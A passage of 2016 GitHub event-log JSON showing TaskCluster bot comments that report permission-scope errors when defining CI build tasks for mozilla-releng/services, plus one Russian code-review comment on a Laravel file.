\"You do not have sufficient scopes. This request requires you\\nto have one of the following sets of scopes:\\n[\\n  [\\n    \\\"secrets:get:repo:github.com/mozilla-releng/services:branch:master\\\"\\n  ]\\n]\\n\\nYou only have the scopes:\\n[\\n  \\\"assume:repo:github.com/mozilla-releng/services:pull-request\\\",\\n  \\\"queue:create-task:aws-provisioner-v1/github-worker\\\",\\n  \\\"queue:route:index.garbage.*\\\",\\n  \\\"secrets:get:garbage/*\\\",\\n  \\\"secrets:set:garbage/*\\\"\\n]\\n\\nIn other words you are missing scopes from one of the options:\\n * Option 0:\\n    - \\\"secrets:get:repo:github.com/mozilla-releng/services:branch:master\\\"\\n----\\nerrorCode:  InsufficientScopes\\nstatusCode: 403\\nrequestInfo:\\n  method:   defineTask\\n  params:   {\\\"taskId\\\":\\\"e9Bbt1GnQNq_eQY49s3C5A\\\"}\\n  payload:  {\\n  \\\"metadata\\\": {\\n    \\\"name\\\": \\\"releng_frontend\\\",\\n    \\\"description\\\": \\\"Test, build and deploy releng_frontend\\\",\\n    \\\"owner\\\": \\\"bastien@nextcairn.com\\\",\\n    \\\"source\\\": \\\"https://github.com/mozilla-releng/services/tree/master/src/releng_frontend\\\"\\n  },\\n  \\\"scopes\\\": [\\n    \\\"secrets:get:repo:github.com/mozilla-releng/services:branch:master\\\"\\n  ],\\n  \\\"extra\\\": {\\n    \\\"github\\\": {\\n      \\\"env\\\": true,\\n      \\\"events\\\": [\\n        \\\"pull_request.*\\\",\\n        \\\"push\\\"\\n      ],\\n      \\\"branches\\\": [\\n        \\\"master\\\"\\n      ]\\n    }\\n  },\\n  \\\"provisionerId\\\": \\\"aws-provisioner-v1\\\",\\n  \\\"workerType\\\": \\\"github-worker\\\",\\n  \\\"payload\\\": {\\n    \\\"maxRunTime\\\": 7200,\\n    \\\"image\\\": \\\"nixos/nix:latest\\\",\\n    \\\"features\\\": {\\n      \\\"taskclusterProxy\\\": true\\n    },\\n    \\\"env\\\": {\\n      \\\"APP\\\": \\\"releng_frontend\\\",\\n      \\\"TASKCLUSTER_SECRETS\\\": \\\"taskcluster/secrets/v1/secret/repo:github.com/mozilla-releng/services:branch:master\\\",\\n      \\\"GITHUB_EVENT\\\": \\\"pull_request.synchronize\\\",\\n      \\\"GITHUB_BRANCH\\\": \\\"master\\\",\\n      \\\"GITHUB_PULL_REQUEST\\\": 59,\\n      \\\"GITHUB_BASE_REPO_URL\\\": \\\"https://github.com/mozilla-releng/services.git\\\",\\n      \\\"GITHUB_BASE_USER\\\": \\\"mozilla-releng\\\",\\n      \\\"GITHUB_BASE_SHA\\\": \\\"c70e3321a3d31f95036588c14dfafc3a0ea581f3\\\",\\n      \\\"GITHUB_BASE_BRANCH\\\": \\\"master\\\",\\n      \\\"GITHUB_BASE_REF\\\": \\\"master\\\",\\n      \\\"GITHUB_HEAD_REPO_URL\\\": \\\"https://github.com/La0/mozilla-relengapi.git\\\",\\n      \\\"GITHUB_HEAD_USER\\\": \\\"La0\\\",\\n      \\\"GITHUB_HEAD_SHA\\\": \\\"ddcbdbb99491947b6efdcebed5392debf43921f2\\\",\\n      \\\"GITHUB_HEAD_BRANCH\\\": \\\"master\\\",\\n      \\\"GITHUB_HEAD_USER_EMAIL\\\": \\\"bastien@nextcairn.com\\\"\\n    },\\n    \\\"command\\\": [\\n      \\\"/bin/bash\\\",\\n      \\\"-c\\\",\\n      \\\"nix-env -iA nixpkgs.gnumake nixpkgs.curl && mkdir /src && cd /src && curl -L https://github.com/mozilla-releng/services/archive/$GITHUB_HEAD_SHA.tar.gz -o $GITHUB_HEAD_SHA.tar.gz && tar zxf $GITHUB_HEAD_SHA.tar.gz && cd services-$GITHUB_HEAD_SHA && ./.taskcluster.sh\\\"\\n    ]\\n  },\\n  \\\"created\\\": \\\"2016-09-23T13:09:01.856Z\\\",\\n  \\\"deadline\\\": \\\"2016-09-24T13:09:01.856Z\\\",\\n  \\\"schedulerId\\\": \\\"task-graph-scheduler\\\",\\n  \\\"taskGroupId\\\": \\\"DfNtv5WrSHK3wLJy5Vvp3g\\\",\\n  \\\"dependencies\\\": [],\\n  \\\"requires\\\": \\\"all-completed\\\",\\n  \\\"routes\\\": [],\\n  \\\"priority\\\": \\\"normal\\\",\\n  \\\"retries\\\": 5,\\n  \\\"tags\\\": {},\\n  \\\"expires\\\": \\\"2017-09-24T13:09:01.856Z\\\"\\n}\\n  time:     2016-09-23T13:09:04.064Z\\ndetails:\\n{\\n  \\\"scopesets\\\": [\\n    [\\n      \\\"secrets:get:repo:github.com/mozilla-releng/services:branch:master\\\"\\n    ]\\n  ],\\n  \\\"scopes\\\": [\\n    \\\"assume:repo:github.com/mozilla-releng/services:pull-request\\\",\\n    \\\"queue:create-task:aws-provisioner-v1/github-worker\\\",\\n    \\\"queue:route:index.garbage.*\\\",\\n    \\\"secrets:get:garbage/*\\\",\\n    \\\"secrets:set:garbage/*\\\"\\n  ]\\n}\",\n            \"requestInfo\": {\n                \"method\": \"defineTask\",\n                \"params\": {\n                    \"taskId\": \"e9Bbt1GnQNq_eQY49s3C5A\"\n                },\n                \"payload\": {\n                    \"metadata\": {\n                        \"name\": \"releng_frontend\",\n                        \"description\": \"Test, build and deploy releng_frontend\",\n                        \"owner\": \"bastien@nextcairn.com\",\n                        \"source\": \"https://github.com/mozilla-releng/services/tree/master/src/releng_frontend\"\n                    },\n                    \"scopes\": [\n                        \"secrets:get:repo:github.com/mozilla-releng/services:branch:master\"\n                    ],\n                    \"extra\": {\n                        \"github\": {\n                            \"env\": true,\n                            \"events\": [\n                                \"pull_request.*\",\n                                \"push\"\n                            ],\n                            \"branches\": [\n                                \"master\"\n                            ]\n                        }\n                    },\n                    \"provisionerId\": \"aws-provisioner-v1\",\n                    \"workerType\": \"github-worker\",\n                    \"payload\": {\n                        \"maxRunTime\": 7200,\n                        \"image\": \"nixos/nix:latest\",\n                        \"features\": {\n                            \"taskclusterProxy\": true\n                        },\n                        \"env\": {\n                            \"APP\": \"releng_frontend\",\n                            \"TASKCLUSTER_SECRETS\": \"taskcluster/secrets/v1/secret/repo:github.com/mozilla-releng/services:branch:master\",\n                            \"GITHUB_EVENT\": \"pull_request.synchronize\",\n                            \"GITHUB_BRANCH\": \"master\",\n                            \"GITHUB_PULL_REQUEST\": 59,\n                            \"GITHUB_BASE_REPO_URL\": \"https://github.com/mozilla-releng/services.git\",\n                            \"GITHUB_BASE_USER\": \"mozilla-releng\",\n                            \"GITHUB_BASE_SHA\": \"c70e3321a3d31f95036588c14dfafc3a0ea581f3\",\n                            \"GITHUB_BASE_BRANCH\": \"master\",\n                            \"GITHUB_BASE_REF\": \"master\",\n                            \"GITHUB_HEAD_REPO_URL\": \"https://github.com/La0/mozilla-relengapi.git\",\n                            \"GITHUB_HEAD_USER\": \"La0\",\n                            \"GITHUB_HEAD_SHA\": \"ddcbdbb99491947b6efdcebed5392debf43921f2\",\n                            \"GITHUB_HEAD_BRANCH\": \"master\",\n                            \"GITHUB_HEAD_USER_EMAIL\": \"bastien@nextcairn.com\"\n                        },\n                        \"command\": [\n                            \"/bin/bash\",\n                            \"-c\",\n                            \"nix-env -iA nixpkgs.gnumake nixpkgs.curl && mkdir /src && cd /src && curl -L https://github.com/mozilla-releng/services/archive/$GITHUB_HEAD_SHA.tar.gz -o $GITHUB_HEAD_SHA.tar.gz && tar zxf $GITHUB_HEAD_SHA.tar.gz && cd services-$GITHUB_HEAD_SHA && ./.taskcluster.sh\"\n                        ]\n                    },\n                    \"created\": \"2016-09-23T13:09:01.856Z\",\n                    \"deadline\": \"2016-09-24T13:09:01.856Z\",\n                    \"schedulerId\": \"task-graph-scheduler\",\n                    \"taskGroupId\": \"DfNtv5WrSHK3wLJy5Vvp3g\",\n                    \"dependencies\": [],\n                    \"requires\": \"all-completed\",\n                    \"routes\": [],\n                    \"priority\": \"normal\",\n                    \"retries\": 5,\n                    \"tags\": {},\n                    \"expires\": \"2017-09-24T13:09:01.856Z\"\n                },\n                \"time\": \"2016-09-23T13:09:04.064Z\"\n            },\n            \"details\": {\n                \"scopesets\": [\n                    [\n                        \"secrets:get:repo:github.com/mozilla-releng/services:branch:master\"\n                    ]\n                ],\n                \"scopes\": [\n                    \"assume:repo:github.com/mozilla-releng/services:pull-request\",\n                    \"queue:create-task:aws-provisioner-v1/github-worker\",\n                    \"queue:route:index.garbage.*\",\n                    \"secrets:get:garbage/*\",\n                    \"secrets:set:garbage/*\"\n                ]\n            }\n        }\n    }\n]\n```"}},"created_at":"2016-09-23T13:09:04Z"}
{"id":"4608446502","type":"CommitCommentEvent","actor":{"login":"webdevium"},"repo":{"name":"Vladnev/Laravel"},"payload":{"comment":{"id":19145903,"position":44,"line":44,"path":"app/UserFunc.php","commit_id":"f5c6c10867aabca89cb2c8ccfd9f4cdc4eefa3cb","created_at":"2016-09-23T13:09:28Z","updated_at":"2016-09-23T13:09:28Z","body":"Это можно заменить на `$userInfo = User::where('email', $email)->first();`, предварительно добавив namespace App\\User в use section файла."}},"created_at":"2016-09-23T13:09:28Z"}
{"id":"4608448886","type":"CommitCommentEvent","actor":{"login":"TaskClusterRobot"},"repo":{"name":"mozilla-releng/services"},"payload":{"comment":{"id":19145907,"position":null,"line":null,"path":null,"commit_id":"15b42d2b28726354aa91a44d09e63fcadee3cbaf","created_at":"2016-09-23T13:09:59Z","updated_at":"2016-09-23T13:09:59Z","body":"Submitting the task to TaskCluster failed. You didn't give the task-graph scopes allowing it define tasks on the queue.Details:\n\n```js\n[\n    {\n        \"message\": \"You do not have sufficient scopes. This request requires you\\nto have one of the following sets of scopes:\\n[\\n  [\\n    \\\"secrets:get:repo:github.com/mozilla-releng/services:branch:master\\\"\\n  ]\\n]\\n\\nYou only have the scopes:\\n[\\n  \\\"assume:repo:github.com/mozilla-releng/services:branch:master\\\",\\n  \\\"queue:create-task:aws-provisioner-v1/github-worker\\\",\\n  \\\"queue:route:index.garbage.*\\\",\\n  \\\"secrets:get:garbage/*\\\",\\n  \\\"secrets:set:garbage/*\\\"\\n]\\n\\nIn other words you are missing scopes from one of the options:\\n * Option 0:\\n    - \\\"secrets:get:repo:github.com/mozilla-releng/services:branch:master\\\"\\n----\\nerrorCode:  InsufficientScopes\\nstatusCode: 403\\nrequestInfo:\\n  method:   defineTask\\n  params:   {\\\"taskId\\\":\\\"PX_9EhHVQ1iDlZ7kqkvMUQ\\\"}\\n  payload:  {\\n  \\\"metadata\\\": {\\n    \\\"name\\\": \\\"shipit_frontend\\\",\\n    \\\"description\\\": \\\"Test, build and deploy shipit_frontend\\\",\\n    \\\"owner\\\": \\\"rok@garbas.si\\\",\\n    \\\"source\\\": \\\"https://github.com/mozilla-releng/services/tree/master/src/shipit_frontend\\\"\\n  },\\n  \\\"scopes\\\": [\\n    \\\"secrets:get:repo:github.com/mozilla-releng/services:branch:master\\\"\\n  ],\\n  \\\"extra\\\": {\\n    \\\"github\\\": {\\n      \\\"env\\\": true,\\n      \\\"events\\\": [\\n        \\\"pull_request.*\\\",\\n        \\\"push\\\"\\n      ],\\n      \\\"branches\\\": [\\n        \\\"master\\\"\\n      ]\\n    }\\n  },\\n  \\\"provisionerId\\\": \\\"aws-provisioner-v1\\\",\\n  \\\"workerType\\\": \\\"github-worker\\\",\\n  \\\"payload\\\": {\\n    \\\"maxRunTime\\\": 7200,\\n    \\\"image\\\": \\\"nixos/nix:latest\\\",\\n    \\\"features\\\": {\\n      \\\"taskclusterProxy\\\": true\\n    },\\n    \\\"env\\\": {\\n      \\\"APP\\\": \\\"shipit_frontend\\\",\\n      \\\"TASKCLUSTER_SECRETS\\\": \\\"taskcluster/secrets/v1/secret/repo:github.com/mozilla-releng/services:branch:master\\\",\\n      \\\"GITHUB_EVENT\\\": \\\"push\\\",\\n      \\\"GITHUB_BRANCH\\\": \\\"master\\\",\\n      \\\"GITHUB_BASE_SHA\\\": \\\"c70e3321a3d31f95036588c14dfafc3a0ea581f3\\\",\\n      \\\"GITHUB_BASE_BRANCH\\\": \\\"master\\\",\\n      \\\"GITHUB_HEAD_REPO_URL\\\": \\\"https://github.com/mozilla-releng/services.git\\\",\\n      \\\"GITHUB_HEAD_USER\\\": \\\"garbas\\\",\\n      \\\"GITHUB_HEAD_SHA\\\": \\\"15b42d2b28726354aa91a44d09e63fcadee3cbaf\\\",\\n      \\\"GITHUB_HEAD_BRANCH\\\": \\\"master\\\",\\n      \\\"GITHUB_HEAD_USER_EMAIL\\\": \\\"rok@garbas.si\\\"\\n    },\\n    \\\"command\\\": [\\n      \\\"/bin/bash\\\",\\n      \\\"-c\\\",\\n      \\\"nix-env -iA nixpkgs.gnumake nixpkgs.curl && mkdir /src && cd /src && curl -L https://github.com/mozilla-releng/services/archive/$GITHUB_HEAD_SHA.tar.gz -o $GITHUB_HEAD_SHA.tar.gz && tar zxf $GITHUB_HEAD_SHA.tar.gz && cd services-$GITHUB_HEAD_SHA && ./.taskcluster.sh\\\"\\n    ]\\n  },\\n  \\\"created\\\": \\\"2016-09-23T13:09:59.537Z\\\",\\n  \\\"deadline\\\": \\\"2016-09-24T13:09:59.537Z\\\",\\n  \\\"schedulerId\\\": \\\"task-graph-scheduler\\\",\\n  \\\"taskGroupId\\\": \\\"PRaBZB-XQuyLR-sqgWhpwg\\\",\\n  \\\"dependencies\\\": [],\\n  \\\"requires\\\": \\\"all-completed\\\",\\n  \\\"routes\\\": [],\\n  \\\"priority\\\": \\\"normal\\\",\\n  \\\"retries\\\": 5,\\n  \\\"tags\\\": {},\\n  \\\"expires\\\": \\\"2017-09-24T13:09:59.537Z\\\"\\n}\\n  time:     2016-09-23T13:09:59.689Z\\ndetails:\\n{\\n  \\\"scopesets\\\": [\\n    [\\n      \\\"secrets:get:repo:github.com/mozilla-releng/services:branch:master\\\"\\n    ]\\n  ],\\n  \\\"scopes\\\": [\\n    \\\"assume:repo:github.com/mozilla-releng/services:branch:master\\\",\\n    \\\"queue:create-task:aws-provisioner-v1/github-worker\\\",\\n    \\\"queue:route:index.garbage.*\\\",\\n    \\\"secrets:get:garbage/*\\\",\\n    \\\"secrets:set:garbage/*\\\"\\n  ]\\n}\",\n        \"error\": {\n            \"code\": \"InsufficientScopes\",\n            \"message\": \"You do not have sufficient scopes. This request requires you\\nto have one of the following sets of scopes:\\n[\\n  [\\n    \\\"secrets:get:repo:github.com/mozilla-releng/services:branch:master\\\"\\n  ]\\n]\\n\\nYou only have the scopes:\\n[\\n  \\\"assume:repo:github.com/mozilla-releng/services:branch:master\\\",\\n  \\\"queue:create-task:aws-provisioner-v1/github-worker\\\",\\n  \\\"queue:route:index.garbage.*\\\",\\n  \\\"secrets:get:garbage/*\\\",\\n  \\\"secrets:set:garbage/*\\\"\\n]\\n\\nIn other words you are missing scopes from one of the options:\\n * Option 0:\\n    - \\\"secrets:get:repo:github.com/mozilla-releng/services:branch:master\\\"\\n----\\nerrorCode:  InsufficientScopes\\nstatusCode: 403\\nrequestInfo:\\n  method:   defineTask\\n  params:   {\\\"taskId\\\":\\\"PX_9EhHVQ1iDlZ7kqkvMUQ\\\"}\\n  payload:  {\\n  \\\"metadata\\\": {\\n    \\\"name\\\": \\\"shipit_frontend\\\",\\n    \\\"description\\\": \\\"Test, build and deploy shipit_frontend\\\",\\n    \\\"owner\\\": \\\"rok@garbas.si\\\",\\n    \\\"source\\\": \\\"https://github.com/mozilla-releng/services/tree/master/src/shipit_frontend\\\"\\n  },\\n  \\\"scopes\\\": [\\n    \\\"secrets:get:repo:github.com/mozilla-releng/services:branch:master\\\"\\n  ],\\n  \\\"extra\\\": {\\n    \\\"github\\\": {\\n      \\\"env\\\": true,\\n      \\\"events\\\": [\\n        \\\"pull_request.*\\\",\\n        \\\"push\\\"\\n      ],\\n      \\\"branches\\\": [\\n        \\\"master\\\"\\n      ]\\n    }\\n  },\\n  \\\"provisionerId\\\": \\\"aws-provisioner-v1\\\",\\n  \\\"workerType\\\": \\\"github-worker\\\",\\n  \\\"payload\\\": {\\n    \\\"maxRunTime\\\": 7200,\\n    \\\"image\\\": \\\"nixos/nix:latest\\\",\\n    \\\"features\\\": {\\n      \\\"taskclusterProxy\\\": true\\n    },\\n    \\\"env\\\": {\\n      \\\"APP\\\": \\\"shipit_frontend\\\",\\n      \\\"TASKCLUSTER_SECRETS\\\": \\\"taskcluster/secrets/v1/secret/repo:github.com/mozilla-releng/services:branch:master\\\",\\n      \\\"GITHUB_EVENT\\\": \\\"push\\\",\\n      \\\"GITHUB_BRANCH\\\": \\\"master\\\",\\n      \\\"GITHUB_BASE_SHA\\\": \\\"c70e3321a3d31f95036588c14dfafc3a0ea581f3\\\",\\n      \\\"GITHUB_BASE_BRANCH\\\": \\\"master\\\",\\n      \\\"GITHUB_HEAD_REPO_URL\\\": \\\"https://github.com/mozilla-releng/services.git\\\",\\n      \\\"GITHUB_HEAD_USER\\\": \\\"garbas\\\",\\n      \\\"GITHUB_HEAD_SHA\\\": \\\"15b42d2b28726354aa91a44d09e63fcadee3cbaf\\\",\\n      \\\"GITHUB_HEAD_BRANCH\\\": \\\"master\\\",\\n      \\\"GITHUB_HEAD_USER_EMAIL\\\": \\\"rok@garbas.si\\\"\\n    },\\n    \\\"command\\\": [\\n      \\\"/bin/bash\\\",\\n      \\\"-c\\\",\\n      \\\"nix-env -iA nixpkgs.gnumake nixpkgs.curl && mkdir /src && cd /src && curl -L https://github.com/mozilla-releng/services/archive/$GITHUB_HEAD_SHA.tar.gz -o $GITHUB_HEAD_SHA.tar.gz && tar zxf $GITHUB_HEAD_SHA.tar.gz && cd services-$GITHUB_HEAD_SHA && ./.taskcluster.sh\\\"\\n    ]\\n  },\\n  \\\"created\\\": \\\"2016-09-23T13:09:59.537Z\\\",\\n  \\\"deadline\\\": \\\"2016-09-24T13:09:59.537Z\\\",\\n  \\\"schedulerId\\\": \\\"task-graph-scheduler\\\",\\n  \\\"taskGroupId\\\": \\\"PRaBZB-XQuyLR-sqgWhpwg\\\",\\n  \\\"dependencies\\\": [],\\n  \\\"requires\\\": \\\"all-completed\\\",\\n  \\\"routes\\\": [],\\n  \\\"priority\\\": \\\"normal\\\",\\n  \\\"retries\\\": 5,\\n  \\\"tags\\\": {},\\n  \\\"expires\\\": \\\"2017-09-24T13:09:59.537Z\\\"\\n}\\n  time:     2016-09-23T13:09:59.689Z\\ndetails:\\n{\\n  \\\"scopesets\\\": [\\n    [\\n      \\\"secrets:get:repo:github.com/mozilla-releng/services:branch:master\\\"\\n    ]\\n  ],\\n  \\\"scopes\\\": [\\n    \\\"assume:repo:github.com/mozilla-releng/services:branch:master\\\",\\n    \\\"queue:create-task:aws-provisioner-v1/github-worker\\\",\\n    \\\"queue:route:index.garbage.*\\\",\\n    \\\"secrets:get:garbage/*\\\",\\n    \\\"secrets:set:garbage/*\\\"\\n  ]\\n}\",\n            \"requestInfo\": {\n                \"method\": \"defineTask\",\n                \"params\": {\n                    \"taskId\": \"PX_9EhHVQ1iDlZ7kqkvMUQ\"\n                },\n                \"payload\": {\n                    \"metadata\": {\n                        \"name\": \"shipit_frontend\",\n                        \"description\": \"Test, build and deploy shipit_frontend\",\n                        \"owner\": \"rok@garbas.si\",\n                        \"source\": \"https://github.com/mozilla-releng/services/tree/master/src/shipit_frontend\"\n                    },\n                    \"scopes\": [\n                        \"secrets:get:repo:github.com/mozilla-releng/services:branch:master\"\n                    ],\n                    \"extra\": {\n                        \"github\": {\n                            \"env\": true,\n                            \"events\": [\n                                \"pull_request.*\",\n                                \"push\"\n                            ],\n                            \"branches\": [\n                                \"master\"\n                            ]\n                        }\n                    },\n                    \"provisionerId\": \"aws-provisioner-v1\",\n                    \"workerType\": \"github-worker\",\n                    \"payload\": {\n                        \"maxRunTime\": 7200,\n                        \"image\": \"nixos/nix:latest\",\n                        \"features\": {\n                            \"taskclusterProxy\": true\n                        },\n                        \"env\": {\n                            \"APP\": \"shipit_frontend\",\n                            \"TASKCLUSTER_SECRETS\": \"taskcluster/secrets/v1/secret/repo:github.com/mozilla-releng/services:branch:master\",\n                            \"GITHUB_EVENT\": \"push\",\n                            \"GITHUB_BRANCH\": \"master\",\n                            \"GITHUB_BASE_SHA\": \"c70e3321a3d31f95036588c14dfafc3a0ea581f3\",\n                            \"GITHUB_BASE_BRANCH\": \"master\",\n                            \"GITHUB_HEAD_REPO_URL\": \"https://github.com/mozilla-releng/services.git\",\n                            \"GITHUB_HEAD_USER\": \"garbas\",\n                            \"GITHUB_HEAD_SHA\": \"15b42d2b28726354aa91a44d09e63fcadee3cbaf\",\n                            \"GITHUB_HEAD_BRANCH\": \"master\",\n                            \"GITHUB_HEAD_USER_EMAIL\": \"rok@garbas.si\"\n                        },\n                        \"command\": [\n                            \"/bin/bash\",\n                            \"-c\",\n                            \"nix-env -iA nixpkgs.gnumake nixpkgs.curl && mkdir /src && cd /src && curl -L https://github.com/mozilla-releng/services/archive/$GITHUB_HEAD_SHA.tar.gz -o $GITHUB_HEAD_SHA.tar.gz && tar zxf $GITHUB_HEAD_SHA.tar.gz && cd services-$GITHUB_HEAD_SHA && ./.taskcluster.sh\"\n                        ]\n                    },\n                    \"created\": \"2016-09-23T13:09:59.537Z\",\n                    \"deadline\": \"2016-09-24T13:09:59.537Z\",\n                    \"schedulerId\": \"task-graph-scheduler\",\n                    \"taskGroupId\": \"PRaBZB-XQuyLR-sqgWhpwg\",\n                    \"dependencies\": [],\n                    \"requires\": \"all-completed\",\n                    \"routes\": [],\n                    \"priority\": \"normal\",\n                    \"retries\": 5,\n                    \"tags\": {},\n                    \"expires\": \"2017-09-24T13:09:59.537Z\"\n                },\n                \"time\": \"2016-09-23T13:09:59.689Z\"\n            },\n            \"details\": {\n                \"scopesets\": [\n                    [\n                        \"secrets:get:repo:github.com/mozilla-releng/services:branch:master\"\n                    ]\n                ],\n                \"scopes\": [\n                    \"assume:repo:github.com/mozilla-releng/services:branch:master\",\n                    \"queue:create-task:aws-provisioner-v1/github-worker\",\n                    \"queue:route:index.garbage.*\",\n                    \"secrets:get:garbage/*\",\n                    \"secrets:set:garbage/*\"\n                ]\n            }\n        }\n    },\n    {\n        \"message\": \"You do not have sufficient scopes. This request requires you\\nto have one of the following sets of scopes:\\n[\\n  [\\n    \\\"secrets:get:repo:github.com/mozilla-releng/services:branch:master\\\"\\n  ]\\n]\\n\\nYou only have the scopes:\\n[\\n  \\\"assume:repo:github.com/mozilla-releng/services:branch:master\\\",\\n  \\\"queue:create-task:aws-provisioner-v1/github-worker\\\",\\n  \\\"queue:route:index.garbage.*\\\",\\n  \\\"secrets:get:garbage/*\\\",\\n  \\\"secrets:set:garbage/*\\\"\\n]\\n\\nIn other words you are missing scopes from one of the options:\\n * Option 0:\\n    - \\\"secrets:get:repo:github.com/mozilla-releng/services:branch:master\\\"\\n----\\nerrorCode:  InsufficientScopes\\nstatusCode: 403\\nrequestInfo:\\n  method:   defineTask\\n  params:   {\\\"taskId\\\":\\\"f-g9IyM4TKeOJEukIugAgA\\\"}\\n  payload:  {\\n  \\\"metadata\\\": {\\n    \\\"name\\\": \\\"releng_frontend\\\",\\n    \\\"description\\\": \\\"Test, build and deploy releng_frontend\\\",\\n    \\\"owner\\\": \\\"rok@garbas.si\\\",\\n    \\\"source\\\": \\\"https://github.com/mozilla-releng/services/tree/master/src/releng_frontend\\\"\\n  },\\n  \\\"scopes\\\": [\\n    \\\"secrets:get:repo:github.com/mozilla-releng/services:branch:master\\\"\\n  ],\\n  \\\"extra\\\": {\\n    \\\"github\\\": {\\n      \\\"env\\\": true,\\n      \\\"events\\\": [\\n        \\\"pull_request.*\\\",\\n        \\\"push\\\"\\n      ],\\n      \\\"branches\\\": [\\n        \\\"master\\\"\\n      ]\\n    }\\n  },\\n  \\\"provisionerId\\\": \\\"aws-provisioner-v1\\\",\\n  \\\"workerType\\\": \\\"github-worker\\\",\\n  \\\"payload\\\": {\\n    \\\"maxRunTime\\\": 7200,\\n    \\\"image\\\": \\\"nixos/nix:latest\\\",\\n    \\\"features\\\": {\\n      \\\"taskclusterProxy\\\": true\\n    },\\n    \\\"env\\\": {\\n      \\\"APP\\\": \\\"releng_frontend\\\",\\n      \\\"TASKCLUSTER_SECRETS\\\": \\\"taskcluster/secrets/v1/secret/repo:github.com/mozilla-releng/services:branch:master\\\",\\n      \\\"GITHUB_EVENT\\\": \\\"push\\\",\\n      \\\"GITHUB_BRANCH\\\": \\\"master\\\",\\n      \\\"GITHUB_BASE_SHA\\\": \\\"c70e3321a3d31f95036588c14dfafc3a0ea581f3\\\",\\n      \\\"GITHUB_BASE_BRANCH\\\": \\\"master\\\",\\n      \\\"GITHUB_HEAD_REPO_URL\\\": \\\"https://github.com/mozilla-releng/services.git\\\",\\n      \\\"GITHUB_HEAD_USER\\\": \\\"garbas\\\",\\n      \\\"GITHUB_HEAD_SHA\\\": \\\"15b42d2b28726354aa91a44d09e63fcadee3cbaf\\\",\\n      \\\"GITHUB_HEAD_BRANCH\\\": \\\"master\\\",\\n      \\\"GITHUB_HEAD_USER_EMAIL\\\": \\\"rok@garbas.si\\\"\\n    },\\n    \\\"command\\\": [\\n      \\\"/bin/bash\\\",\\n      \\\"-c\\\",\\n      \\\"nix-env -iA nixpkgs.gnumake nixpkgs.curl && mkdir /src && cd /src && curl -L https://github.com/mozilla-releng/services/archive/$GITHUB_HEAD_SHA.tar.gz -o $GITHUB_HEAD_SHA.tar.gz && tar zxf $GITHUB_HEAD_SHA.tar.gz && cd services-$GITHUB_HEAD_SHA && ./.taskcluster.sh\\\"\\n    ]\\n  },\\n  \\\"created\\\": \\\"2016-09-23T13:09:59.537Z\\\",\\n  \\\"deadline\\\": \\\"2016-09-24T13:09:59.537Z\\\",\\n  \\\"schedulerId\\\": \\\"task-graph-scheduler\\\",\\n  \\\"taskGroupId\\\": \\\"PRaBZB-XQuyLR-sqgWhpwg\\\",\\n  \\\"dependencies\\\": [],\\n  \\\"requires\\\": \\\"all-completed\\\",\\n  \\\"routes\\\": [],\\n  \\\"priority\\\": \\\"normal\\\",\\n  \\\"retries\\\": 5,\\n  \\\"tags\\\": {},\\n  \\\"expires\\\": \\\"2017-09-24T13:09:59.537Z\\\"\\n}\\n  time:     2016-09-23T13:09:59.699Z\\ndetails:\\n{\\n  \\\"scopesets\\\": [\\n    [\\n      \\\"secrets:get:repo:github.com/mozilla-releng/services:branch:master\\\"\\n    ]\\n  ],\\n  \\\"scopes\\\": [\\n    \\\"assume:repo:github.com/mozilla-releng/services:branch:master\\\",\\n    \\\"queue:create-task:aws-provisioner-v1/github-worker\\\",\\n    \\\"queue:route:index.garbage.*\\\",\\n    \\\"secrets:get:garbage/*\\\",\\n    \\\"secrets:set:garbage/*\\\"\\n  ]\\n}\",\n        \"error\": {\n            \"code\": \"InsufficientScopes\",\n            \"message\": \"You do not have sufficient scopes. This request requires you\\nto have one of the following sets of scopes:\\n[\\n  [\\n    \\\"secrets:get:repo:github.com/mozilla-releng/services:branch:master\\\"\\n  ]\\n]\\n\\nYou only have the scopes:\\n[\\n  \\\"assume:repo:github.com/mozilla-releng/services:branch:master\\\",\\n  \\\"queue:create-task:aws-provisioner-v1/github-worker\\\",\\n  \\\"queue:route:index.garbage.*\\\",\\n  \\\"secrets:get:garbage/*\\\",\\n  \\\"secrets:set:garbage/*\\\"\\n]\\n\\nIn other words you are missing scopes from one of the options:\\n * Option 0:\\n    - \\\"secrets:get:repo:github.com/mozilla-releng/services:branch:master\\\"\\n----\\nerrorCode:  InsufficientScopes\\nstatusCode: 403\\nrequestInfo:\\n  method:   defineTask\\n  params:   {\\\"taskId\\\":\\\"f-g9IyM4TKeOJEukIugAgA\\\"}\\n  payload:  {\\n  \\\"metadata\\\": {\\n    \\\"name\\\": \\\"releng_frontend\\\",\\n    \\\"description\\\": \\\"Test, build and deploy releng_frontend\\\",\\n    \\\"owner\\\": \\\"rok@garbas.si\\\",\\n    \\\"source\\\": \\\"https://github.com/mozilla-releng/services/tree/master/src/releng_frontend\\\"\\n  },\\n  \\\"scopes\\\": [\\n    \\\"secrets:get:repo:github.com/mozilla-releng/services:branch:master\\\"\\n  ],\\n  \\\"extra\\\": {\\n    \\\"github\\\": {\\n      \\\"env\\\": true,\\n      \\\"events\\\": [\\n        \\\"pull_request.*\\\",\\n        \\\"push\\\"\\n      ],\\n      \\\"branches\\\": [\\n        \\\"master\\\"\\n      ]\\n    }\\n  },\\n  \\\"provisionerId\\\": \\\"aws-provisioner-v1\\\",\\n  \\\"workerType\\\": \\\"github-worker\\\",\\n  \\\"payload\\\": {\\n    \\\"maxRunTime\\\": 7200,\\n    \\\"image\\\": \\\"nixos/nix:latest\\\",\\n    \\\"features\\\": {\\n      \\\"taskclusterProxy\\\": true\\n    },\\n    \\\"env\\\": {\\n      \\\"APP\\\": \\\"releng_frontend\\\",\\n      \\\"TASKCLUSTER_SECRETS\\\": \\\"taskcluster/secrets/v1/secret/repo:github.com/mozilla-releng/services:branch:master\\\",\\n      \\\"GITHUB_EVENT\\\": \\\"push\\\",\\n      \\\"GITHUB_BRANCH\\\": \\\"master\\\",\\n      \\\"GITHUB_BASE_SHA\\\": \\\"c70e3321a3d31f95036588c14dfafc3a0ea581f3\\\",\\n      \\\"GITHUB_BASE_BRANCH\\\": \\\"master\\\",\\n      \\\"GITHUB_HEAD_REPO_URL\\\": \\\"https://github.com/mozilla-releng/services.git\\\",\\n      \\\"GITHUB_HEAD_USER\\\": \\\"garbas\\\",\\n      \\\"GITHUB_HEAD_SHA\\\": \\\"15b42d2b28726354aa91a44d09e63fcadee3cbaf\\\",\\n      \\\"GITHUB_HEAD_BRANCH\\\": \\\"master\\\",\\n      \\\"GITHUB_HEAD_USER_EMAIL\\\": \\\"rok@garbas.si\\\"\\n    },\\n    \\\"command\\\": [\\n      